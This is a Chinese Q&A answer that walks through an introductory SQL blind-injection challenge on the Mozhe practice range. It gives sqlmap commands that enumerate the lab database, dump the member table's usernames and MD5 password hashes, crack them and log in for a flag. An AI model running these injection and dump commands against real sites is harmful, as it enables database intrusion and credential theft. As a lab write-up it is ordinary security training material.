墨者靶场SQL盲注(入门)
发布网友
发布时间:2024-10-03 02:25
我来回答
共1个回答
热心网友
时间:2024-10-28 00:56
在墨者靶场的入门探索中,我们首要关注的是SQL注入漏洞。直接进入,忽略登录界面,寻找潜在的注入点。
在浏览页面时,注意到URL参数id的存在,自然而然地把它作为可能的注入入口。然而,真正验证这个假设需要借助工具。我们引入sqlmap,这是一个强大的SQL注入检测和利用工具。
通过运行`sqlmap.py -u 219.153.49.228:42711/ne... --dbs`,我们成功找到了数据库。接下来,进一步探索表结构,执行了`sqlmap.py -u 219.153.49.228:42711/ne... -D stormgroup --tables`,获取了数据库中的表名。继续深入,使用`sqlmap.py -u 219.153.49.228:42711/ne... -D stormgroup -T member --columns`获取表`member`的列信息。
关键的一步,我们尝试获取`member`表中`name`和`password`列的值,命令为`sqlmap.py -u 219.153.49.228:42711/ne... -D stormgroup -T member -C name,password --dump`。结果显示,密码已被md5加密。经过解密后,我们发现可以使用获取的第二账号登录,登录后揭示出一个名为KEY的重要信息。